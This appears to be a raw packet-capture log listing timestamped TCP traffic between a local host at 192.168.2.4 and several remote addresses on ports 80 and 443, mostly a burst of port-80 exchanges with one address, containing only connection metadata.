Nov 15, 2024 14:09:19.208769083 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208811998 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208820105 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.208837032 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208894014 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.208910942 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.209359884 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.212903023 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.218029022 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.218086004 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.218106031 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.218156099 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.218213081 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.223310947 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.228836060 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.228893042 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.228908062 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.228935957 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.228992939 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.232016087 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.274872065 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.274880886 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.275111914 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.275335073 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.275402069 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.613344908 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.613581896 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.613615036 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.614123106 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.614212990 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.615165949 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.615220070 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.619390965 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.619473934 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.619585991 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.619596004 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.619620085 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.663347006 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.664465904 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.901016951 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.945719004 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.945729017 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.946800947 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.946858883 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.947051048 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:19.947063923 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:19.947530985 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:20.222064972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:20.222136021 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:20.289452076 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:20.698208094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:20.698308945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:20.704633951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:20.704652071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:20.704721928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:21.336716890 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:21.336750984 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:21.336966991 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:21.338234901 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:21.338249922 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:21.507528067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:21.507596016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:21.528354883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:21.550709963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:22.326991081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:22.327092886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:22.357070923 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:22.357147932 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:22.360181093 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:22.360188007 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:22.360543966 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:22.415081024 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:22.707406998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:22.717581034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:23.226854086 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.235218048 CET	49723	80	192.168.2.4	199.232.210.172
Nov 15, 2024 14:09:23.271344900 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.336430073 CET	80	49723	199.232.210.172	192.168.2.4
Nov 15, 2024 14:09:23.336661100 CET	49723	80	192.168.2.4	199.232.210.172
Nov 15, 2024 14:09:23.510493994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:23.510611057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:23.568814039 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568850994 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568861008 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568877935 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568887949 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568896055 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568927050 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.568950891 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.568977118 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.569001913 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.573555946 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.573643923 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.573653936 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.573664904 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:23.573717117 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:23.809525013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:23.823749065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101326942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101397991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101443052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101545095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.101736069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101756096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.101802111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.102349043 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.102473974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.102494955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103013039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.103060961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103081942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103116989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103209972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.103209972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.103749037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103770971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103801012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.103840113 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.104312897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.262949944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.263117075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.263267994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.263309002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.263644934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.263972998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.263993025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.264061928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.264846087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.264866114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.265784025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.265821934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.265861034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.265861034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.266119957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.266709089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.266730070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.266797066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.267740965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.267793894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.267941952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.267941952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.268810987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.268831968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.268866062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.268965960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.268965960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.269581079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.269602060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.269678116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.270384073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.270404100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.271034002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.271229029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.271271944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.271286964 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.271341085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.271341085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.291749954 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:24.291774035 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:24.291784048 CET	49755	443	192.168.2.4	52.149.20.212
Nov 15, 2024 14:09:24.291790009 CET	443	49755	52.149.20.212	192.168.2.4
Nov 15, 2024 14:09:24.411798000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.411931038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.411952972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.412018061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.412018061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.412281990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.412302971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.412538052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.413408995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.413446903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.413722992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.413722992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.414232969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.414269924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.414416075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.414416075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.415747881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.415769100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.416163921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.416589022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.416609049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.416625977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.416677952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.418055058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.418092012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.418157101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.418299913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.419048071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.419066906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.419337988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.420285940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.420305014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.420377016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.421144009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.421164036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.421196938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.421449900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.421449900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.421705008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.421726942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.422440052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.422446966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.422466993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.422874928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.423172951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.423172951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.426826954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.427227974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.427746058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.427783012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.428596973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.428596973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.428617001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.428638935 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.428776026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.429604053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.429666996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.430640936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.431231022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.431432009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.431452990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.431485891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.432446957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.432482958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.432662964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.432662964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.432662964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.432662964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.433554888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.433574915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.433881998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.434544086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.434565067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.434823990 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.557707071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.557789087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.558018923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.558063984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.558077097 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.558196068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.558531046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.558567047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.558624983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.558624983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.559241056 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.559277058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.559520006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.559868097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.559904099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.559933901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.560046911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.560046911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.560046911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.560677052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.560714960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.560762882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.560762882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.561417103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.561454058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.561489105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.561522007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.561522007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.561549902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.561872959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.561909914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.561959028 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.561959028 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.562486887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.562524080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.562709093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.563191891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.563227892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.563277006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.563277006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.563716888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.563757896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.563844919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.563844919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.564299107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.564313889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.564347982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.564392090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.564392090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.564687967 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.564968109 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.565017939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.565036058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.565134048 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.566117048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.566153049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.566401005 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.567101002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.567137957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.567226887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.568284035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.568320990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.568366051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.568413973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.568504095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.569051981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.569088936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.569132090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.569132090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.569962025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.569998980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.570043087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.570043087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.570944071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.570980072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.571026087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.571111917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.571887016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.571922064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.571969032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.571969032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.572626114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.572669029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.572693110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.572702885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.572788000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.572985888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.573402882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.573448896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.573695898 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.574098110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.574146986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.574155092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.574155092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.574212074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.574925900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.574974060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.575234890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.575476885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.575516939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.575562954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.575654984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.575654984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.576174974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.576210976 CET	80	49752	185.215.113.206	192.168.2.4
